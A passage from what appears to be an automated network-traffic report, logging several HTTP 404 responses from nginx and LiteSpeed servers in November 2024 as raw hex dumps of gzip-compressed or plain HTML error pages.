d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Nov 2024 08:17:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Nov 2024 08:17:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Nov 2024 08:17:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 29 Nov 2024 08:18:00 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 29 Nov 2024 08:18:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 29 Nov 2024 08:18:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 